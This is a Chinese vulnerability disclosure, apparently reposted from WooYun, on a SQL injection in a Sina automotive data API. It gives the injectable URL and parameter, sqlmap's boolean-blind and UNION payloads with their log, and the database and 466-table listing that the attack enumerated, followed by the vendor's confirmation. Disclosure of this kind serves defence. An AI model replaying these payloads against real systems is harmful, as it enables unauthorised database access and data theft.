新浪某站SQL注入漏洞

2017年3月27日08:00:11评论338 views字数 192阅读0分38秒阅读模式

摘要

2016-03-22：细节已通知厂商并且等待厂商处理中
2016-03-22：厂商已经确认，细节仅向厂商公开
2016-04-01：细节向核心白帽子及相关领域专家公开
2016-04-11：细节向普通白帽子公开
2016-04-21：细节向实习白帽子公开
2016-05-06：细节向公众公开

漏洞概要关注数(14) 关注此漏洞

缺陷编号： WooYun-2016-187450

漏洞标题：新浪某站SQL注入漏洞

漏洞作者：心云

提交时间： 2016-03-22 09:19

公开时间： 2016-05-06 12:10

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 20

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：注入

0人收藏

漏洞详情

披露状态：

简要描述：

求个首页求高rank

详细说明：

注入点：

code 区域

http://data.auto.sina.com.cn/car/api/car_detail/filter_car.php?callback=jQuery1720008847676683217287_1458496287365&oe=utf-8&subid=2027&_=1458496287525

注入参数为 subid

丢给sqlmap

code 区域

Parameter: subid (GET)
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: callback=jQuery1720008847676683217287_1458496287365&oe=utf-8&subid=2027 AND 2090=2090&_=1458496287525
 
     Type: UNION query
     Title: MySQL UNION query (17) - 6 columns
     Payload: callback=jQuery1720008847676683217287_1458496287365&oe=utf-8&subid=2027 UNION ALL SELECT 17,17,17,17,17,CONCAT(0x7171717171,0x4c796f
 ---
 [20:17:23] [INFO] testing MySQL
 [20:17:23] [INFO] confirming MySQL
 [20:17:25] [INFO] the back-end DBMS is MySQL
 back-end DBMS: MySQL >= 5.0.0
 [20:17:25] [INFO] fetching database names
 [20:17:25] [INFO] the SQL query used returns 3 entries
 [20:17:25] [INFO] retrieved: information_schema
 [20:17:26] [INFO] retrieved: dataauto
 [20:17:26] [INFO] retrieved: test
 available databases [3]:
 [*] dataauto
 [*] information_schema
 [*] test

漏洞证明：

当前user ，库：

当前库466个表：

具体表信息：

code 区域

Database: dataauto
 [466 tables]
 +-----------------------------+
 | Complaints                  |
 | admin_accounts              |
 | admin_data_auto_log         |
 | admin_project               |
 | anbangbaoxian               |
 | api_log                     |
 | assurecar                   |
 | auto_brands                 |
 | auto_brands_related         |
 | auto_car                    |
 | auto_car_info               |
 | auto_car_info_new           |
 | auto_car_new                |
 | auto_clicks                 |
 | auto_clicks_days            |
 | auto_color                  |
 | auto_dealer                 |
 | auto_groups                 |
 | auto_highlights             |
 | auto_market                 |
 | auto_module_cache           |
 | auto_newcar                 |
 | auto_news                   |
 | auto_o_n_log                |
 | auto_sale                   |
 | auto_sub_cache              |
 | auto_subbrand_top_info      |
 | auto_subbrands              |
 | auto_subbrands_price        |
 | auto_type                   |
 | auto_vote                   |
 | autoxianxing                |
 | beautifycar                 |
 | bitauto_adv                 |
 | bitauto_carcontrast         |
 | bitauto_city                |
 | bitauto_news                |
 | bitauto_price               |
 | bitauto_price_20110130      |
 | bitauto_price_bak           |
 | bitauto_price_bak_20100917  |
 | bitauto_price_g             |
 | bitauto_price_tmp           |
 | bitauto_province            |
 | bitauto_subbrandcontrast    |
 | bitauto_vendor              |
 | bitauto_vendor_1119         |
 | bitauto_vendor_1122         |
 | bitauto_vendor_bak_1122     |
 | bitauto_vendor_bak_20100917 |
 | bitauto_vendor_g            |
 | bitauto_vendor_ne           |
 | bitauto_vendor_tmp          |
 | buycar                      |
 | buycar_score                |
 | cachekey                    |
 | car_hot_rank                |
 | car_hot_trend               |
 | car_pv                      |
 | ce_ping                     |
 | comReplay                   |
 | compare_log                 |
 | compare_log_pic             |
 | compare_log_refer           |
 | data_match_1                |
 | data_match_10               |
 | data_match_100              |
 | data_match_101              |
 | data_match_102              |
 | data_match_103              |
 | data_match_104              |
 | data_match_105              |
 | data_match_106              |
 | data_match_107              |
 | data_match_108              |
 | data_match_109              |
 | data_match_11               |
 | data_match_110              |
 | data_match_111              |
 | data_match_112              |
 | data_match_113              |
 | data_match_114              |
 | data_match_115              |
 | data_match_116              |
 | data_match_117              |
 | data_match_118              |
 | data_match_119              |
 | data_match_12               |
 | data_match_120              |
 | data_match_121              |
 | data_match_122              |
 | data_match_123              |
 | data_match_124              |
 | data_match_125              |
 | data_match_126              |
 | data_match_127              |
 | data_match_128              |
 | data_match_129              |
 | data_match_13               |
 | data_match_130              |
 | data_match_131              |
 | data_match_132              |
 | data_match_133              |
 | data_match_134              |
 | data_match_135              |
 | data_match_136              |
 | data_match_137              |
 | data_match_138              |
 | data_match_139              |
 | data_match_14               |
 | data_match_140              |
 | data_match_141              |
 | data_match_142              |
 | data_match_143              |
 | data_match_144              |
 | data_match_145              |
 | data_match_146              |
 | data_match_147              |
 | data_match_148              |
 | data_match_149              |
 | data_match_15               |
 | data_match_150              |
 | data_match_151              |
 | data_match_152              |
 | data_match_153              |
 | data_match_154              |
 | data_match_155              |
 | data_match_156              |
 | data_match_157              |
 | data_match_158              |
 | data_match_159              |
 | data_match_16               |
 | data_match_160              |
 | data_match_161              |
 | data_match_162              |
 | data_match_163              |
 | data_match_164              |
 | data_match_165              |
 | data_match_166              |
 | data_match_167              |
 | data_match_168              |
 | data_match_169              |
 | data_match_17               |
 | data_match_170              |
 | data_match_171              |
 | data_match_172              |
 | data_match_173              |
 | data_match_174              |
 | data_match_175              |
 | data_match_176              |
 | data_match_177              |
 | data_match_178              |
 | data_match_179              |
 | data_match_18               |
 | data_match_180              |
 | data_match_181              |
 | data_match_182              |
 | data_match_183              |
 | data_match_184              |
 | data_match_185              |
 | data_match_186              |
 | data_match_187              |
 | data_match_188              |
 | data_match_189              |
 | data_match_19               |
 | data_match_190              |
 | data_match_191              |
 | data_match_192              |
 | data_match_193              |
 | data_match_194              |
 | data_match_195              |
 | data_match_196              |
 | data_match_197              |
 | data_match_198              |
 | data_match_199              |
 | data_match_2                |
 | data_match_20               |
 | data_match_200              |
 | data_match_21               |
 | data_match_22               |
 | data_match_23               |
 | data_match_24               |
 | data_match_25               |
 | data_match_26               |
 | data_match_27               |
 | data_match_28               |
 | data_match_29               |
 | data_match_3                |
 | data_match_30               |
 | data_match_31               |
 | data_match_32               |
 | data_match_33               |
 | data_match_34               |
 | data_match_35               |
 | data_match_36               |
 | data_match_37               |
 | data_match_38               |
 | data_match_39               |
 | data_match_4                |
 | data_match_40               |
 | data_match_41               |
 | data_match_42               |
 | data_match_43               |
 | data_match_44               |
 | data_match_45               |
 | data_match_46               |
 | data_match_47               |
 | data_match_48               |
 | data_match_49               |
 | data_match_5                |
 | data_match_50               |
 | data_match_51               |
 | data_match_52               |
 | data_match_53               |
 | data_match_54               |
 | data_match_55               |
 | data_match_56               |
 | data_match_57               |
 | data_match_58               |
 | data_match_59               |
 | data_match_6                |
 | data_match_60               |
 | data_match_61               |
 | data_match_62               |
 | data_match_63               |
 | data_match_64               |
 | data_match_65               |
 | data_match_66               |
 | data_match_67               |
 | data_match_68               |
 | data_match_69               |
 | data_match_7                |
 | data_match_70               |
 | data_match_71               |
 | data_match_72               |
 | data_match_73               |
 | data_match_74               |
 | data_match_75               |
 | data_match_76               |
 | data_match_77               |
 | data_match_78               |
 | data_match_79               |
 | data_match_8                |
 | data_match_80               |
 | data_match_81               |
 | data_match_82               |
 | data_match_83               |
 | data_match_84               |
 | data_match_85               |
 | data_match_86               |
 | data_match_87               |
 | data_match_88               |
 | data_match_89               |
 | data_match_9                |
 | data_match_90               |
 | data_match_91               |
 | data_match_92               |
 | data_match_93               |
 | data_match_94               |
 | data_match_95               |
 | data_match_96               |
 | data_match_97               |
 | data_match_98               |
 | data_match_99               |
 | data_match_every_day        |
 | data_match_newdata          |
 | data_match_newdata_top      |
 | dpool_check_db              |
 | feedback                    |
 | feiyong_guanxi              |
 | feiyong_guanxi_quxiao       |
 | feiyong_guanxi_xinru        |
 | feiyong_xinxi               |
 | feiyong_xinxi_total         |
 | finecar                     |
 | group_buyers                |
 | group_car                   |
 | group_car_vote              |
 | group_car_votedetail        |
 | group_city_info             |
 | group_seller_info           |
 | group_sellers               |
 | group_sellers_detail        |
 | hot_seo                     |
 | hot_seo_new                 |
 | iauto_save                  |
 | iauto_save_tmp              |
 | iauto_trend                 |
 | iauto_trend_tmp             |
 | iauto_trend_tmp2            |
 | index_focus                 |
 | iwords                      |
 | iwords_new                  |
 | iwords_sub                  |
 | iwords_test                 |
 | jdpower_car                 |
 | jdpower_type                |
 | koubei                      |
 | koubei_click_rank           |
 | koubei_comment              |
 | koubei_div_log              |
 | koubei_grab                 |
 | koubei_grab_ts              |
 | koubei_impression           |
 | koubei_impression_user      |
 | koubei_new_0                |
 | koubei_new_1                |
 | koubei_new_10               |
 | koubei_new_11               |
 | koubei_new_12               |
 | koubei_new_13               |
 | koubei_new_14               |
 | koubei_new_15               |
 | koubei_new_16               |
 | koubei_new_17               |
 | koubei_new_18               |
 | koubei_new_19               |
 | koubei_new_2                |
 | koubei_new_20               |
 | koubei_new_21               |
 | koubei_new_22               |
 | koubei_new_23               |
 | koubei_new_24               |
 | koubei_new_25               |
 | koubei_new_26               |
 | koubei_new_27               |
 | koubei_new_28               |
 | koubei_new_29               |
 | koubei_new_3                |
 | koubei_new_30               |
 | koubei_new_31               |
 | koubei_new_4                |
 | koubei_new_5                |
 | koubei_new_6                |
 | koubei_new_7                |
 | koubei_new_8                |
 | koubei_new_9                |
 | koubei_new_total            |
 | koubei_praise               |
 | koubei_rank                 |
 | koubei_rank_wj              |
 | koubei_recommend            |
 | koubei_report               |
 | koubei_score                |
 | koubei_score_avg            |
 | koubei_score_new            |
 | koubei_score_week_avg       |
 | koubei_tag_sorted           |
 | koubei_test                 |
 | koubei_tt                   |
 | koubei_userscores           |
 | koubei_view                 |
 | koubei_view2                |
 | koubei_wap_err              |
 | koubei_wb_info              |
 | koubei_xw                   |
 | koubei_xw1                  |
 | listcar                     |
 | listcar_total               |
 | listperm                    |
 | local_price                 |
 | local_price_tmp             |
 | luntai_brands               |
 | luntai_koubei               |
 | luntai_subbrands            |
 | luntais                     |
 | maintain                    |
 | maintaincar                 |
 | mapproject                  |
 | mycar                       |
 | new_view_brands             |
 | new_view_carlist            |
 | new_view_subbrands          |
 | news_feedback               |
 | news_from_so                |
 | news_info                   |
 | news_pop                    |
 | news_score                  |
 | oil_brands                  |
 | oil_koubei                  |
 | oil_subbrands               |
 | oil_use                     |
 | oil_use_test                |
 | oil_use_v                   |
 | oilcar                      |
 | oils                        |
 | os_gasoline_setting         |
 | os_gasoline_type            |
 | os_ministry_data            |
 | os_netizens_data            |
 | os_param                    |
 | os_param_base               |
 | os_param_list               |
 | os_param_type               |
 | os_road_conditions          |
 | os_score                    |
 | os_search_setting           |
 | os_searchwd                 |
 | os_user_addrecord           |
 | os_weight                   |
 | permonth_update             |
 | photo_api                   |
 | publish_key                 |
 | refitcar                    |
 | searchPic                   |
 | shareMan                    |
 | shiche                      |
 | shicheMan                   |
 | shichetubiao                |
 | shuyu                       |
 | stopcar                     |
 | sub_fav                     |
 | subbrand_attention          |
 | subbrand_koubei_reports     |
 | subbrand_month_rank         |
 | subbrand_news_forum_comment |
 | subnameupdate               |
 | temp_bitauto_vendor         |
 | test                        |
 | umlike                      |
 | umnews                      |
 | used_car_appraiser          |
 | used_car_certification      |
 | used_car_dealer             |
 | used_car_honor              |
 | used_car_info               |
 | used_car_linkman            |
 | used_car_news               |
 | used_car_pic                |
 | user_admin                  |
 | user_admin_module_map       |
 | user_log                    |
 | user_modle_tree             |
 | user_score                  |
 | user_total                  |
 | user_type                   |
 | vedioMan                    |
 | vendor_brand                |
 | vendor_brand_bak            |
 | vendor_brand_tmp            |
 | vin_upload                  |
 | washcar                     |
 | weibo_log_1106              |
 | weibo_log_110622            |
 | weibo_log_110623            |
 | weibo_log_110624            |
 | weibo_log_110625            |
 | weibo_log_110626            |
 | weibo_log_110627            |
 | weibo_log_1107              |
 | weibo_log_1108              |
 | weibo_log_1109              |
 | weibo_log_1110              |
 | weibo_log_1111              |
 | weibo_log_1112              |
 | wom_top_data                |
 | xlsj_month                  |
 | xlsjk                       |
 | xlsjk2                      |
 | xlsjk_tmp                   |
 | yangche_focuscar            |
 | yh_avgconsumptionall        |
 | yh_brands                   |
 | yh_car                      |
 | yh_chexi                    |
 | ztmp_bitauto_carcontrast    |
 +-----------------------------+

只跑个admin表其他表不跑了反正危害很严重：

修复方案：

1.过滤

2.希望给个高rank 谢谢咯

版权声明：转载请注明来源心云@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：6

确认时间：2016-03-22 12:10

厂商回复：

感谢关注新浪安全，问题修复中。

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞概要 关注数(14) 关注此漏洞

缺陷编号： WooYun-2016-187450

漏洞标题： 新浪某站SQL注入漏洞

相关厂商： 新浪

漏洞作者： 心云

提交时间： 2016-03-22 09:19

公开时间： 2016-05-06 12:10

漏洞类型： SQL注射漏洞

危害等级： 高

自评Rank： 20

漏洞状态： 厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 注入

0人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 心云@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(14) 关注此漏洞

漏洞标题：新浪某站SQL注入漏洞

相关厂商：新浪

漏洞作者：心云

危害等级：高

漏洞状态：厂商已经确认

Tags标签：注入

版权声明：转载请注明来源心云@乌云

漏洞评价(共0人评价):

登陆后才能进行评分